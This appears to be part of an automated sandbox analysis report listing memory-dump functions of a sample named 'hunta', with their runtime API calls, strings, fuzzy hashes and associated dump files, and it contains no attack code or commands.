Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f89e40cb7768e84ad6909f14f66b060e18f75d1654c61bd57af5da251b3156f8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 96112BB7A4418243D628CA2EC4F56BBA395EBD533273C437AD1824F758DE62D945F600

Function 059B0CB7 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079b9bf07538038380de2479634e16dda71df8c6d05e8b951cae7925505e9f5c
Instruction ID: 0eab48aeaff4fbe7600e1f9b1b4fae7744227e16229e078dc5922ed6144dc308
Opcode Fuzzy Hash: 079b9bf07538038380de2479634e16dda71df8c6d05e8b951cae7925505e9f5c
Instruction Fuzzy Hash: 6FF0E5F340C2606EB642C9E16799DF72BEEE9D2270321CC57F846CA427C3981D4E5136

Function 00EEAB20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EEAB43
std::_Lockit::_Lockit.LIBCPMT ref: 00EEAB65
std::_Lockit::~_Lockit.LIBCPMT ref: 00EEAB85
std::_Lockit::~_Lockit.LIBCPMT ref: 00EEABAF
std::_Lockit::_Lockit.LIBCPMT ref: 00EEAC1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00EEAC69
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00EEAC83
std::_Lockit::~_Lockit.LIBCPMT ref: 00EEAD18
std::_Facet_Register.LIBCPMT ref: 00EEAD25

Strings

bad locale name, xrefs: 00EEAD3F

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: d33a32ce90d2405068ea3b88ca5bfd5ce78402658cc9ee1e4dc677b796701ee0
Instruction ID: 04ba5c535d1d759f6d3a5e434f861cd82371f34e1ccd0ce50c5d6bdc7b0d6236
Opcode Fuzzy Hash: d33a32ce90d2405068ea3b88ca5bfd5ce78402658cc9ee1e4dc677b796701ee0
Instruction Fuzzy Hash: 706150B1D002489FDF11DFA5DD45B9EBBB4AF14354F184069E804BB381E739E909DBA2

Function 00E83770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E837E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E83835
__Getctype.LIBCPMT ref: 00E8384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00E8386A
std::_Lockit::~_Lockit.LIBCPMT ref: 00E838FF

Strings

bad locale name, xrefs: 00E8391C
0:, xrefs: 00E83848

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:$bad locale name
API String ID: 1840309910-2133831286
Opcode ID: 0e359f722b8e0089dfe1c1ff736a0b1bd02019b432141132bc404192d2eeeb58
Instruction ID: c0a6cd02b6202f9e376233fa597e23dfff4ee92374d3edd2c10ad2a471993fe1
Opcode Fuzzy Hash: 0e359f722b8e0089dfe1c1ff736a0b1bd02019b432141132bc404192d2eeeb58
Instruction Fuzzy Hash: E85150F1D003489BDB10EFA5DC4579EBBB8AF14714F144129ED08BB281E779EA09DB92

Function 00F604D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F60507
___except_validate_context_record.LIBVCRUNTIME ref: 00F6050F
_ValidateLocalCookies.LIBCMT ref: 00F60598
__IsNonwritableInCurrentImage.LIBCMT ref: 00F605C3
_ValidateLocalCookies.LIBCMT ref: 00F60618

Strings

csm, xrefs: 00F605AD

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7bf2def2c25cdfcc67e84c51f2da82f9f45fb282af431bc9872c0bda201835a8
Instruction ID: 50d11b516fb56c61699ad2059ae72d9dfece9e7bbe2807404b60edc7349ea58c
Opcode Fuzzy Hash: 7bf2def2c25cdfcc67e84c51f2da82f9f45fb282af431bc9872c0bda201835a8
Instruction Fuzzy Hash: 85419634E002089BCF10DF69C880A9F7BB5BF45364F288165E8159B292DB35EE15EF91

Function 00EE9240 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EE9263
std::_Lockit::_Lockit.LIBCPMT ref: 00EE9286
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE92A6
std::_Facet_Register.LIBCPMT ref: 00EE931B
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE9333
Concurrency::cancel_current_task.LIBCPMT ref: 00EE934B

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: f3a80943b20882d878f83964762941d1adc40e3aec47157731046832193eb641
Instruction ID: 15a44984bd2937195548da19172fedbbcd48e79c8355855d544e3e7b4201dbe6
Opcode Fuzzy Hash: f3a80943b20882d878f83964762941d1adc40e3aec47157731046832193eb641
Instruction Fuzzy Hash: 4241D071900259AFCF14DF98E881BAEBBB4FB05714F144259E914BB3A2E734AD04CBD1

Function 00E85DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00E860F2
___std_exception_destroy.LIBVCRUNTIME ref: 00E8617F
___std_exception_copy.LIBVCRUNTIME ref: 00E86248

Strings

recursive_directory_iterator::operator++, xrefs: 00E861CC

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 89887d5558882277c18a04cc14ae53da7d10d08bacc312b2b4dc06325e1e4f64
Instruction ID: cd100b714313b2d75725099ee265512359fa16a9824b477162a0e9d846f703c0
Opcode Fuzzy Hash: 89887d5558882277c18a04cc14ae53da7d10d08bacc312b2b4dc06325e1e4f64
Instruction Fuzzy Hash: 51E125B19006049FDB28EF68CC45BAEB7F9FF44300F14461DE45AA7781EB74A948CBA1

Function 00E884C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00E886DE
___std_exception_destroy.LIBVCRUNTIME ref: 00E886ED

Strings

at line , xrefs: 00E88518
, column , xrefs: 00E88555, 00E8856B

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 9397cd874c7b7f30ed6e4eaeb0e5d64011924d06b26cfa50f97658cb38c8a4c6
Instruction ID: dc3126f153b7455f13d0869592c56bcb8b0bcd4c9f482ef0f90fed6b649d9006
Opcode Fuzzy Hash: 9397cd874c7b7f30ed6e4eaeb0e5d64011924d06b26cfa50f97658cb38c8a4c6
Instruction Fuzzy Hash: 28616A71D002049FDB08DF68CD8579EBBB5FF44310F144218E819B7782EB74AA84D795

Function 00EF3150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00EF4109
___std_exception_destroy.LIBVCRUNTIME ref: 00EF4122

Strings

value, xrefs: 00EF402F

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 93e3a214772809458b6b4c23e1e4fa5485542b38f22dbda4966a084e4dc35477
Instruction ID: d78d3eb3cfa18823a08f7af2e09d0964d9ffd3fc8d10605df98b030329c449ec
Opcode Fuzzy Hash: 93e3a214772809458b6b4c23e1e4fa5485542b38f22dbda4966a084e4dc35477
Instruction Fuzzy Hash: 4751AFB0C0024CDBEF14DBA4CC85BEEBBB4AF05304F148259E545B7782DB796A88DB61

Function 00E83B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E83C0F

Strings

ios_base::eofbit set, xrefs: 00E83BB6
ios_base::badbit set, xrefs: 00E83BA7, 00E83BD2, 00E83BF3
ios_base::failbit set, xrefs: 00E83AC8, 00E83BB1

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: db0a51ffb02d572d3dbe5cd25aeb4e5b76e6f6466b01fb5fd9d9aa43ee371135
Instruction ID: d38282643a5ea793e111c95dce8849b8e36d8e5fa0351b0932c593101993da22
Opcode Fuzzy Hash: db0a51ffb02d572d3dbe5cd25aeb4e5b76e6f6466b01fb5fd9d9aa43ee371135
Instruction Fuzzy Hash: 8611C3B29007046BC710EE68D805A96B3E8AF05710F18852AFE5C9B242F774AA149BA1

Function 00EF26F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00EF2BD3

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 4811b98eb665683169139149f0abbe74905aea30da4a49044ca67c6799861bff
Instruction ID: 336892515c5033d7dc9359a5f66a5129c4611d15d6c0fafa215645d6caba64a4
Opcode Fuzzy Hash: 4811b98eb665683169139149f0abbe74905aea30da4a49044ca67c6799861bff
Instruction Fuzzy Hash: 63E1C471A005099FCB18DF68C891AB9B7E5FF88314F14836DEA19AB395E730ED51CB90

Function 00E88080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E8844D

Strings

ror, xrefs: 00E880D4
parse error, xrefs: 00E88149, 00E88162

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 6997eb101b6265c4146a943fc46d5e13fa111e4bc321a415182f37498fc3e088
Instruction ID: d670436caffc0337682e11ec04dff5cfb1fbdd5ef40749c1d2183b63b26454f2
Opcode Fuzzy Hash: 6997eb101b6265c4146a943fc46d5e13fa111e4bc321a415182f37498fc3e088
Instruction Fuzzy Hash: BBC12571D00249DFEB08DF68CD85BADBB71FF55304F548248E818BB692DB74AA84CB91

Function 00E87DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00E88051
___std_exception_destroy.LIBVCRUNTIME ref: 00E88060

Strings

[json.exception., xrefs: 00E87E1C

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
